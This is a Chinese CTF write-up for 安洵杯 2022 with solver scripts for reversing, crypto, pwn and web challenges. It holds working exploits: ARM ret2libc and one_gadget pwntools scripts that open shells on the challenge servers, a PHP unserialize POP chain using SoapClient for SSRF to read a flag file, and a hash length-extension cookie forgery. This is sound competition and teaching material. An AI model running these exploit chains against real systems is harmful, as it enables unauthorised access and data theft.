安洵杯2022 Writeups - CNSS

Re

REEE

没难度的花指令,patch一下就过了

# Ciphertext dumped from the binary: 24 bytes, the first three given as the
# characters 'V', 'a', 'c' and the remainder as raw byte values.
Text = [
    ord('V'), ord('a'), ord('c'), 0xA4, 0x22, 0xA4, 0x50, 0x7D,
    0xCD, 0x8D, 0x13, 0x3D, 0x4A, 0x4F, 0xD, 0x62,
    0x88, 0xAB, 0xFC, 0xE9, 0xBB, 0x1E, 0xA0, 0x90,
]
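def Generatekey(key=b"D0g3"):
    """Run the RC4 key-scheduling step and return the 256-entry state table.

    Mirrors the binary's key setup: the state starts as the identity
    permutation, the key is repeated to fill 256 slots, and each index ``i``
    is swapped with ``j = (j + S[i] + K[i]) % 256``.  The hard-coded ``v6``
    table further down is presumably this function's output for the default
    key (not verified here).

    Args:
        key: key material as bytes or a sequence of ints (a ``str`` is
            UTF-8 encoded).  Defaults to the binary's ``D0g3``.

    Returns:
        A list of 256 ints forming a permutation of ``range(256)``.

    Raises:
        ValueError: if ``key`` is empty.
    """
    if isinstance(key, str):
        key = key.encode()
    if not key:
        raise ValueError("key must not be empty")
    # Key repeated to 256 entries (the original's v16 array).
    schedule = [key[i % len(key)] for i in range(256)]
    state = list(range(256))
    j = 0
    for i in range(256):
        j = (j + state[i] + schedule[i]) % 256
        state[i], state[j] = state[j], state[i]
    return state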

# RC4 state table as dumped from the binary.
v6 = [68, 52, 90, 171, 193, 145, 254, 142, 218, 189, 46, 108, 188, 22, 110, 139, 92, 69, 238, 180, 169, 85, 219, 87, 179, 252, 125, 191, 23, 61, 246, 47, 234, 53, 141, 50, 3, 170, 183, 135, 243, 18, 114, 44, 148, 6, 118, 207, 103, 250, 227, 175, 239, 102, 220, 109, 184, 19, 98, 168, 182, 120, 235, 100, 119, 89, 210, 72, 134, 205, 122, 244, 123, 152, 121, 197, 105, 27, 77, 167, 99, 159, 242, 0, 147, 144, 196, 93, 64, 48, 14, 84, 177, 204, 221, 128, 96, 241, 186, 129, 10, 133, 157, 104, 8, 192, 5, 181, 214, 151, 236, 36, 60, 127, 111, 208, 136, 178, 215, 95, 161, 165, 247, 112, 80, 7, 131, 78, 12, 223, 200, 233, 86, 206, 28, 158, 66, 1, 113, 176, 248, 74, 146, 216, 42, 149, 154, 21, 232, 198, 163, 70, 71, 156, 174, 51, 39, 57, 17, 106, 224, 226, 43, 83, 249, 82, 185, 237, 76, 75, 160, 54, 40, 115, 55, 199, 9, 225, 166, 130, 41, 79, 15, 45, 62, 222, 194, 212, 228, 31, 4, 91, 30, 245, 195, 155, 116, 25, 173, 217, 67, 251, 255, 230, 101, 73, 211, 11, 97, 137, 202, 162, 59, 37, 126, 150, 65, 209, 132, 164, 20, 201, 13, 29, 107, 143, 58, 140, 26, 56, 88, 34, 35, 213, 24, 38, 81, 229, 153, 63, 231, 2, 187, 138, 190, 33, 253, 32, 117, 49, 172, 203, 94, 16, 124, 240]
# Untouched copy of the same table; the script never reads it.
v5 = list(v6)
# cip is an alias of Text, so the loop below decrypts Text in place.
cip = Text
j = 0
v4 = 0
# RC4 keystream generation: step i, mix j, swap, and XOR the output byte
# S[(S[i] + S[j]) % 256] into the ciphertext.
for ii in range(24):
    v4 = (v4 + 1) % 256
    j = (j + v6[v4]) % 256
    v6[v4], v6[j] = v6[j], v6[v4]
    cip[ii] ^= v6[(v6[v4] + v6[j]) % 256]

print("".join(chr(c) for c in cip), end="")

好像有反调,但是也不用调

Re1

看了半天才看出来是虚拟机(

// VM dispatcher as decompiled by IDA.  this[3] is the bytecode pointer
// (starting at byte_405018); the loop stops when the current opcode is
// -12 (0xF4 as a byte).
this[3] = &byte_405018;
for ( i = byte_405018; i != -12; i = *(_BYTE *)this[3] )
{
    // Linear search of the opcode table that starts at this + 4: at most
    // 7 entries, the handler for entry v3 living at this[2 * v3 + 5].
    v3 = 0;
    v4 = this + 4;
    while ( i != *v4 )
    {
        ++v3;
        v4 += 8;
        if ( v3 >= 7 )
            goto LABEL_7;  // opcode not in the table: no handler is called
    }
    // Call the matching handler with the VM context.  Nothing in this loop
    // advances this[3], so the handler presumably moves it past the
    // instruction it consumed.
    ((void (__cdecl *)(_DWORD *))this[2 * v3 + 5])(this);
LABEL_7:
    ;
}

相当于一个分发器,找到opcode对应的代码

虚拟机第一段大概结构

0xF1, 0xE1, 0x00, 0x00, 0x00, 0x00, 
0xF1, 0xE2, 0x30, 0x00, 0x00, 0x00,
0xF2,
0xF6,
0xF1, 0xE4, 0x20, 0x00, 0x00, 0x00,
mov r1, [buf+0]
mov r2, [buf+30h]
r1 ^= r2
r1 = (r1 << 2) | (r1 >> 6)
mov [buf+20h], r1

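# Stage 1 of the VM, rewritten from the bytecode above: each input byte is
# XORed with the byte 0x30 further on, rotated left by two bits and stored
# at offset 0x20.  `buf` is the VM's memory (defined elsewhere).
for i in range(12):
    x = buf[i] ^ buf[0x30 + i]
    # 8-bit rotate: mask so the stored value stays a byte, matching the
    # byte-wise inverse (ror2 & 0xFF) used by the solver below.
    buf[0x20 + i] = ((x << 2) | (x >> 6)) & 0xFF
# All twelve results live at 0x20..0x2B inclusive, so the slice ends at 0x2C
# (the earlier 0x2B end bound dropped the last byte).
res = buf[0x20:0x2C]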

第二段重复结构

0xF1, 0xE1, 0x20, 0x00, 0x00, 0x00, 
0xF1, 0xE2, 0x21, 0x00, 0x00, 0x00,
0xF8, 0xE2, 0xA4,
0xF2,
0xF9, 0xE1, 0x05,
0xF1, 0xE4, 0x40, 0x00, 0x00, 0x00,
mov r1, [buf+20h]
mov r2, [buf+21h]
add r2, A4h
xor r1, r2
sub r1, 05h
mov [buf+40h], r1

直接写exp解就可以了

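# Solver for the VM challenge: undo stage 2 (add / xor / sub) and then
# stage 1 (rotate-left-2 after an XOR with xorkey).
xorkey = "abcdefghijkl"
cip = [0xA7, 0x3A, 0x19, 0xB4, 0xF1, 0x49, 0x2B, 0xCB, 0xEA, 0x0E, 0x0E, 0x14]
addkey = [0xA4, 0x70, 0x4F, 0xD3, 0x5F, 0x03, 0x08, 0x28, 0x7F, 0x29, 0x37, 0xBA]
subkey = [0x05, 0x97, 0x79, 0x47, 0x92, 0x4A, 0xBD, 0x39, 0x29, 0x3B, 0xC1, 0xD1]
'''
for i in range(12):
a = res[i]
b = res[(i+1)%12]
b += key1[i]
a ^= b
a -= key2[i]
res[i] = a
'''
# Stage 2 ran forward for i = 0..11, and entry 11 read the already-updated
# entry 0, so it is undone from 11 down to 0.  The earlier `while i != 0`
# stopped at i == 1 and never restored cip[0], which is why the first
# character came out wrong.
for i in range(11, -1, -1):
    a = cip[i] + subkey[i]               # undo the subtraction
    b = cip[(i + 1) % 12] + addkey[i]    # the value that was XORed in
    cip[i] = (a ^ b) & 0xFF              # undo the XOR, keep it a byte

# Stage 1 inverse: rotate right by two bits, then strip the XOR key.
for i in range(12):
    cip[i] = ((cip[i] >> 2) | (cip[i] << 6)) & 0xFF
    cip[i] ^= ord(xorkey[i])
    print(chr(cip[i]), end="")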

exp有一点小写挂,但是第一个字母很好猜,懒得调了。

flower.pyc

pycdas反汇编成字节码,太长不放了

直接看字节码就可以了

My_base64_encode函数返回的是tmp2,也就是使用Base64Table而不是Base46Table

626     LOAD_GLOBAL             6: ord
628 LOAD_GLOBAL 18: Base64Table
630 LOAD_FAST 3: i
632 LOAD_CONST 22: 22
634 BINARY_XOR
636 BINARY_SUBSCR
638 CALL_FUNCTION 1
640 STORE_FAST 15: tmp2

这一段其实是把原来的base64[i]改成base64[i^22]而已,没啥难度

后面分析一下jump可以知道充当密文的是KeyInputCmp

258     LOAD_NAME               16: ret
260 LOAD_NAME 18: i
262 LOAD_NAME 18: i
264 LOAD_CONST 40: 4
266 BINARY_ADD
268 BUILD_SLICE 2
270 BINARY_SUBSCR
272 LOAD_NAME 19: Key1
274 LOAD_NAME 17: j
276 STORE_SUBSCR
278 LOAD_NAME 17: j
280 LOAD_CONST 41: 1
282 BINARY_ADD
284 STORE_NAME 17: j
286 LOAD_NAME 18: i
288 LOAD_CONST 40: 4
290 BINARY_ADD
292 STORE_NAME 18: i
294 LOAD_NAME 17: j
296 LOAD_CONST 42: 10
298 COMPARE_OP 2 (==)
300 POP_JUMP_IF_FALSE 258
304 JUMP_ABSOLUTE 312
308 JUMP_ABSOLUTE 258

人脑反编译一下这段,

# Hand-decompiled sketch of the bytecode above.  It is not runnable as
# written: Key1 is a str (so item assignment would fail) and the names
# input_srt / input_str differ, exactly as in the original notes.
input_srt = input()
ret = My_base64_encode(input_str)
j = 0
i = 0
Key1 = "1234512345"
len_ret = len(ret) // 4

# Offsets 258-300 in the listing: split the encoding into ten 4-character
# chunks, Key1[j] = ret[i:i+4].
while j != 10:
    Key1[j] = ret[i:i+4]
    j = j + 1
    i = i + 4

# The comparisons that follow (one per chunk, in shuffled order) pass each
# chunk through str_hex (presumably a hex encoder) and compare it with an
# entry of KeyInputCmp.
keyCheck = ''
if keyCheck[0] == keyinputcom[8]:
//xxx

大概是这样,后面是重复的比较,但是是乱序的,基本都是这样的代码:

668     LOAD_NAME               19: Key1
670 LOAD_CONST 46: 8
672 BINARY_SUBSCR
674 STORE_NAME 22: keyCheck
676 LOAD_NAME 6: str_hex
678 LOAD_NAME 22: keyCheck
680 CALL_FUNCTION 1
682 LOAD_NAME 3: KeyInputCmp
684 LOAD_CONST 50: 3
686 BINARY_SUBSCR
688 COMPARE_OP 2 (==)

可以很轻松的找出对应关系:

0 == 8
1 == 9
2 == 1
3 == 7
4 == 5
5 == 0
6 == 6
7 == 4
8 == 3
9 == 2

写exp解一下就行了

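import base64

# Hex-encoded comparison strings pulled from KeyInputCmp, and the KeyInputCmp
# index each Key1 slot is compared against (the "0 == 8, 1 == 9, ..." table).
inputcmp = ['63356268', '75344678', '75386c6c', '2b69755a', '53546c57', '31396c34', '35547376', '36546c73', '3038736f','2b4f6167']
order = [8, 9, 1, 7, 5, 0, 6, 4, 3, 2]
# Re-assemble the custom-base64 text in Key1 order; each entry is four hex
# byte pairs.  latin-1 maps every byte value to the code point chr() gives.
xx = "".join(bytes.fromhex(inputcmp[idx]).decode("latin-1") for idx in order)
print(xx)
cip = xx
# Shuffled alphabet used by My_base64_encode.  Only the first 64 characters
# matter; the tail is junk the original linear scan never reached either.
b64table = "i5jLW7S0GX6uf1cv3ny4q8es2Q+bdkYgKOIT/tAxUrFlVPzhmow9BHCMDpEaJRZNn1NSP78VQ5iZqVVRMA9ZZ2r77eeGLnwdj8"
# The Base46Table decoy from the .pyc; kept for reference, never used.
b46table = "vwxrstuopq34567ABCDEFGHIJyz012PQRSTKLMNOZabcdUVWXYefghijklmn89+/n1NSP78VQ5iZqVVRMA9ZZ2r77eeGLnwdj8"
orib64table = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X',
               'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',
               'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',
               'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
               'w', 'x', 'y', 'z', '0', '1', '2', '3',
               '4', '5', '6', '7', '8', '9', '+', '/']
# Position of each shuffled-alphabet character (first occurrence wins, as the
# original inner loop's `break` did), so the lookup is O(1) per character.
position = {}
for j, ch in enumerate(b64table[:len(orib64table)]):
    position.setdefault(ch, j)
# The encoder indexed Base64Table[i ^ 22], so map back with j ^ 22 on the
# standard alphabet.  Characters outside the table are dropped, as before.
res = "".join(orib64table[position[ch] ^ 22] for ch in cip if ch in position)
print(res)
# res is now standard base64 of the original input; decode it.
flag = base64.b64decode(res)
print(flag)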

Crypto

Cry1

直接猜

Cry2

由于是ECB模式,直接对每个字符枚举一下,判断多出来的那个块的加密结果和中间的块是否一致,从而得到flag2,再解密flag1

from Crypto.Util.number import *

from pwnlib.util.iters import mbruteforce
from hashlib import sha256

from gmpy2 import *
from pwn import *
# Alphabet for the proof-of-work brute force: letters plus digits.
table = string.ascii_letters+string.digits
context.log_level = 'INFO'
def passpow():
    """Solve the service's proof-of-work on the module-level ``io`` connection.

    Reads the 16-character suffix that follows ``XXXX + `` and the target
    sha256 hex digest that follows ``:``, brute-forces the 4-character prefix
    over ``table`` (fixed length 4), and sends the match back.
    """
    io.recvuntil(b"XXXX + ")
    suffix = io.recv(16).decode("utf8")
    io.recvuntil(b":")
    cipher = io.recvline().strip().decode("utf8")
    proof = mbruteforce(lambda x: sha256((x + suffix).encode()).hexdigest() ==
                        cipher, table, length=4, method='fixed')
    io.sendline(proof.encode())
# Connect, clear the proof-of-work, then hand the session to the terminal;
# the oracle loop further down only runs once that interactive session ends.
io = remote("120.78.131.38",10086)
passpow()
io.interactive()
# for i in table:
# for j in table:
# for k in table:
# io.recvuntil(b"You can input anything:")
# payload = 'a'*8+'D0g3{'+i+j+k+'a'*8
# io.send(payload)
# io.recvuntil("Here is your cipher:")
# ans = eval(io.recvline().strip())
# #print(eval(ans))
# if(ans[:32]==ans[32:64]):
# print(f"[+] the begin of flag find")
# break
# else:
# continue
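def pad(message):
    """Right-pad *message* with ``'0'`` to a multiple of 16 and return bytes.

    Args:
        message: text to pad (length measured in characters).

    Returns:
        ``message`` encoded as UTF-8 after padding with ASCII ``'0'`` up to
        the next 16-character boundary; already-aligned input (including the
        empty string) is returned encoded and unchanged.
    """
    # The original wrote ``.encode`` without parentheses on the padded
    # branch and so returned the bound method instead of bytes.
    remainder = len(message) % 16
    if remainder:
        message = message + '0' * (16 - remainder)
    return message.encode()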
# Byte-at-a-time ECB recovery, building the secret backwards from the closing
# '}'.  Each query is 'a'*8 + guess + known-suffix + '0'*16; the returned
# ciphertext is compared at [32:64] and [96:] (one 16-byte block each when it
# is hex-encoded), which is the "extra block vs. middle block" check from the
# write-up.  Presumably the server appends the secret after the input so the
# two blocks match exactly when the guess is right — confirm against the
# challenge source.
s = '}'
for count in range(16):
    for j in table:
        io.recvuntil(b"You can input anything:")
        payload = 'a'*8+j+s+'0'*16
        io.send(payload)
        io.recvuntil("Here is your cipher:")
        # eval() on data read from the network: tolerable in a throw-away
        # CTF script, but ast.literal_eval parses the same literal safely.
        ans = eval(io.recvline().strip())
        #print(ans)
        #print(eval(ans))
        if(ans[32:64]==ans[96:]):
            print(f"find")
            s=j+s
            break
print(s)

Cry3

重放一下,然后跟裴蜀定理差不多思路直接搞出m

from Crypto.Util.number import *

from pwnlib.util.iters import mbruteforce
from hashlib import sha256

from gmpy2 import *
from pwn import *
# table = string.ascii_letters+string.digits
# #context.log_level = 'INFO'
# def passpow():
# io.recvuntil(b"XXXX + ")
# suffix = io.recv(16).decode("utf8")
# io.recvuntil(b":")
# cipher = io.recvline().strip().decode("utf8")
# proof = mbruteforce(lambda x: sha256((x + suffix).encode()).hexdigest() ==
# cipher, table, length=4, method='fixed')
# io.sendline(proof.encode())
# io = remote("120.78.131.38",10010)

# name1 = b'Whitfield__Diffi'
# name2 = b'e\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f'
# passpow()
# io.recvuntil("You must prove your identity to enter the palace ")
# C2 = int(io.recvline().strip(),16)
# name3 = long_to_bytes(C2^bytes_to_long(name1))
# io.send(name1+name2+name3+b'e')
# io.interactive()

(n, e1, e2, e3, c1, c2, c3) = (22308063714724452462594175772991482949404087975464067035286926170510749469125951641759623382890929400347746890505884025343468199849382152129033272670139207089014677113113424809369328057582620162865035543317066533190393744283598272438845018622940301755160967872602292917835296754028362203808307584958603387195521445377597539445755458119452713550910375839516122426821521274842873512978083170006162247527925037149151668443476001575317932297665482659481394810205993003893995684866908002062271941956877471366757465575174256530437864971949351751736657628134970316614793008232274949428845584851921309831050025268239920768589, 102704332752181173923908819345629527902559536200780272500702211857535517619064704374411352496824282428945235226706158016527940582310143442545788334065493882004470882657669068688548620446107390261774658636500170711922369121039264037791095962879707842376429141973467244013988871944421006633374000076432398620003, 165024902300996486453250888431039770568455943494755406694300391530994540175636663116553204440134778407337307301460534682861806187189412764722546099599285990828615604909111450378976251576050085610489178357078007828219728557992383528971392957583260743553237449781953940645938194303496517166079233440666514142521, 107929560700309464157348651169173146220713772911796919305761307127461813369090151746375666969221990592569250063102706312476803094329768752681754067815879864302941541362558648688816497421814512346852785167870392158541036594552798889655777378465522515892890374899516745808520849406338663060136664638205556905043, 
8976406727259724401299593595974980423707886782418395663751444023362258263733237825549335125593984970498964093926006506809407513739183877755080526746531784959508737528600673070549242752177151129934047736890218618269644537828781231102744490749358089179171258321041577394587256373836785948820649808906200846088007957638183529565834875238204811163959551661247023747453209053532225832697125512950472772012185437462739088177332539644160978507985506812909546081830927038827528741774562515041663527602352404037444608291874464488338563500547497203145793336577512312851057567039426378864709438811757836733947860437752813073874, 7584524158725320074351784008519359374835951182992745058458048197251225256217803579600661491448464709943199922793159440956832342486020658392985408148122076326077812360990228994100769128474350056829654154788136760604131377845850956612933335186807666096081087705683527511023019284806846230411687893860322513658398698585532273414360069680401820566586007994163738298494558008326730136375705508372078954815745900383550589962367012092080704502635672544194563751350559218413839917658776581704952130399408036722236518241425397151292343989872422950843379617438893384112277887591993537242445573025423923301782066153841655087502, 12874907551207425853492066654210858231128780920602368657199977782691574832459718666244273465903557961294316057005108395257019922683946928508127643188812288873745597482079150648654475438398475817448433170854139857872300496456279812169769412244202082471971305133576730899060805915616216358001628177568898898527037406152306282427979677110245757943176624517838900030800465266313362806799265965766599961842838169077198908865450510259994567677548739991152611337656240833140093470022212202352612456680492844455065366040157461325780359734965239758270305599164579819847852805648715356918391619296289571364834908114405235733717)

# Two extended-gcd steps give Bezout coefficients with
# a1*e1 + a2*e2 + a3*e3 == one; the second print must show one == 1 for the
# recovery below to be valid.
(E1,a1,a2) = gcdext(e1,e2)
print((E1,a1,a2))
(one,A1,A2)=gcdext(E1,e3)
print((one,A1,A2))
a1 = a1*A1
a2 = a2*A1
a3 = A2
#print(a1*e1+a2*e2+a3*e3)
#print(a1,a2,a3)
# m = c1^a1 * c2^a2 * c3^a3 mod n, all three ciphertexts sharing n.  Written
# for a2 >= 0 and a1, a3 <= 0: the two negative-exponent terms are raised
# with positive exponents and inverted together.  NOTE(review): if the signs
# printed above differ, pow() is being asked for a negative exponent — check
# the coefficients before trusting the output.
print(long_to_bytes((pow(c2,a2,n)*invert(pow(c1,-a1,n)*pow(c3,-a3,n),n)%n)))

Pwn

babyarm

首先过变表base64,msg=b's1mpl3Dec0d4r\n'

然后一个裸的栈溢出,ret2libc即可

from pwn import *
# The message that passes the service's custom-base64 check (see above).
msg = b's1mpl3Dec0d4r\n'
#io = process("qemu-arm -L /usr/arm-linux-gnueabi/ -g 1237 ./chall",shell = True)
io = remote("47.108.29.107",10260)
io.recvuntil("msg> ")
io.send(msg)

elf = ELF("./chall")
# ARM ROP gadgets taken from ./chall (addresses as found in the binary).
pop_r45678_sb_sl_pc = 0x00010cb0
pop_r3_pc = 0x00010464
mov_r0_r7_blx_r3 = 0x00010ca0
libc = ELF("./libc-2.27.so")
#io.interactive()
main_addr = 0x00010C30
# Stage 1: 32+8+4 bytes of filler up to the saved return address, then
# r3 = puts@plt, r7 = puts@got (r4-r6 and r8/sb/sl zeroed), and the
# mov r0, r7 / blx r3 gadget calls puts(puts@got) to leak a libc address.
# The trailing main_addr copies return into main for a second round.
payload = b'a'*(32+8+4)+p32(pop_r3_pc)+p32(elf.plt['puts'])+p32(pop_r45678_sb_sl_pc)+p32(0)*3+p32(elf.got['puts'])+p32(0)*3+p32(mov_r0_r7_blx_r3)+p32(main_addr)*10
io.recvuntil("comment> ")
io.send(payload)
# The first four bytes printed back are the leaked address of puts.
puts_got = u32(io.recv(4))
print(f"[+] puts_got = {hex(puts_got)}")
libc_base = puts_got-libc.sym['puts']
print(f"[+] libc_base = {hex(libc_base)}")
sys_addr = libc_base+libc.sym['system']
binsh_addr = libc_base+next(libc.search(b"/bin/sh"))
print(f"[+] sys_addr = {hex(sys_addr)}")
print(f"[+] binsh_addr = {hex(binsh_addr)}")
# Stage 2: the same chain shape with r3 = system and r7 = "/bin/sh".
payload = b'a'*(32+8+4)+p32(pop_r3_pc)+p32(sys_addr)+p32(pop_r45678_sb_sl_pc)+p32(0)*3+p32(binsh_addr)+p32(0)*3+p32(mov_r0_r7_blx_r3)+p32(main_addr)*10

# main runs again, so the msg check has to be passed a second time.
io.recvuntil("msg> ")
io.send(msg)
io.recvuntil("comment> ")
io.send(payload)
io.interactive()

easybf

对栈上的指针做操作,修改九号函数为one_gadget,最后执行jmp rax的时候跳转到one_gadget。不过要把函数表中的0号函数清零,使得[rsp+0x40] = NULL;最后也用不到这个函数进行指针偏移,所以没有影响

from pwn import *
#io = process("./chall")
# Remote target; swap in the process() line above for local debugging.
io = remote("47.108.29.107",10260)
def debug(cmd=''):
    """Attach gdb to the live ``io`` target with ``cmd`` as its script, then pause."""
    gdb.attach(io,cmd)
    pause()

"""
0x4f2a5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL

0x4f302 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL

0x10a2fc execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
"""
"""
0-> function 8
43-> function 2
44-> function 5
45-> function 3
46-> function 4
60-> function 0
62-> function 1
91-> function 6
93 ->function 7
"""
elf = ELF("./chall")
libc = ELF("./libc-2.27.so")

# Candidate one_gadget offsets for this libc; their constraints are listed
# in the string above.  Index 1 ([rsp+0x40] == NULL) is the one used.
one = [0x4f2a5,0x4f302,0x10a2fc]


# First program: 32 '>' then eight ".>" pairs.  Per the opcode table above,
# '>' is function 1 and '.' is function 4 — presumably brainfuck-style
# pointer moves and byte output, so this prints 8 bytes from the stack.
payload = '>'*32+'.>'*8
io.recvuntil("len>")
io.sendline(str(128))
io.recvuntil("code> ")
io.send(payload)

# Reassemble the leaked pointer (little-endian, zero-extended to 8 bytes)
# and subtract its fixed offset to get the libc base.
leak_addr = u64((io.recv()+io.recv(5)).ljust(8,b'\x00'))
libc_base = leak_addr -0x401b40
print(f'[+] libc_base = {hex(libc_base)}')

one_gadget = libc_base+one[1]
# Computed but not used by the final payload (leftovers from an earlier
# approach).
pop_rdi_ret = libc_base+0x000000000002164f
binsh_addr = libc_base+next(libc.search(b"/bin/sh"))
sys_addr = libc_base+libc.sym['system']
ret = libc_base+ 0xb1488
sub_rsp = libc_base+0x0000000000157e51
print(f'[+] sys_addr = {hex(sys_addr)}')
print(f'[+] binsh_addr = {hex(binsh_addr)}')
print(f'[+] one_gadget = {hex(one_gadget)}')
# Second program: '<' is function 0 and ',' is function 5 (input).  Move
# back 8 cells and read 8 bytes, then move back 80 more and read 8 again;
# the 16 bytes sent below fill those reads — the one_gadget address first,
# then eight zero bytes (the function-9 / function-0 overwrite the write-up
# describes; which read lands on which slot is not visible here).
payload = '<'*8+',>'*8+'<'*10*8+',>'*8
io.recvuntil("len>")
io.sendline(str(512))
io.recvuntil("code> ")
io.sendline(payload)
#debug()

io.send(p64(one_gadget)+p64(0))

io.interactive()

Web

easy_php

pop链

// Build the object graph that the target's unserialize() will walk:
// B --a--> C --c--> A --b--> C.
$a = new A();
// NOTE(review): a "0e..." string — presumably chosen for a loose (==)
// comparison inside A; confirm against the class source.
$a->a = "0e215962017";

$b = new B();

$c = new C();
$c->c =$a;

$b->a = $c;

// Second C hung off A->b; "ssrf" is presumably the action selector that
// leads to the SoapClient call described below — confirm in the class source.
$cc = new C();
$cc->a = "ssrf";
$a->b = $cc;

// The serialized outer object is the payload string.
echo serialize($b);
exit;

查看 phpinfo发现session.serialize_handler=php,ini_set($_GET['baby'], $_GET['d0g3']);可以设置 php_serialize

利用session序列化不一致,根据flag.php构造$_SESSION['sess']对象,使其到达call_user_func(...)执行;那么可以用SoapClient调用任意不存在的方法造成SSRF访问flag.php

首先根据提示,利用GlobIterator查找根目录文件

// SoapClient with its location pointed at the local flag.php; when the
// unserialized object has an undefined method called on it, the SOAP request
// is sent to that URL (the SSRF described above).  The query asks flag.php
// to run GlobIterator over /f* to list the flag file's name.
$a = new SoapClient(null, array('location' => 'http://127.0.0.1/flag.php?a=GlobIterator&b=/f*', 'uri' => 'http://127.0.0.1/'));
$b = serialize($a);
echo $b;

通过 var_dump($_SESSION); 拿到 sessionid 设置后再访问,拿到flag文件名 f1111llllllaagg

再利用SplFileObject读flag

// Same SoapClient trick as above, now asking flag.php to open the file
// found in the previous step with SplFileObject.
$a = new SoapClient(null, array('location' => 'http://127.0.0.1/flag.php?a=SplFileObject&b=/f1111llllllaagg', 'uri' => 'http://127.0.0.1/'));
$b = serialize($a);
echo $b;

EZ_JS

根据注释

<!--This secret is 7 characters long for security!
hash=md5(secret+"flag");// 1946714cfa9deb70cc40bab32872f98a
admin cookie is md5(secret+urldecode("flag%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00X%00%00%00%00%00%00%00dog"));
-->

爆破得到secret = abcdefg,admin cookie = ed63246fb602056fee4a7ec886d0a3c2,用admin尝试登录,/cookie jsfuck注解提示 admin大写,用Admin登录,改cookie里的hash为ed63246fb602056fee4a7ec886d0a3c2拿到flag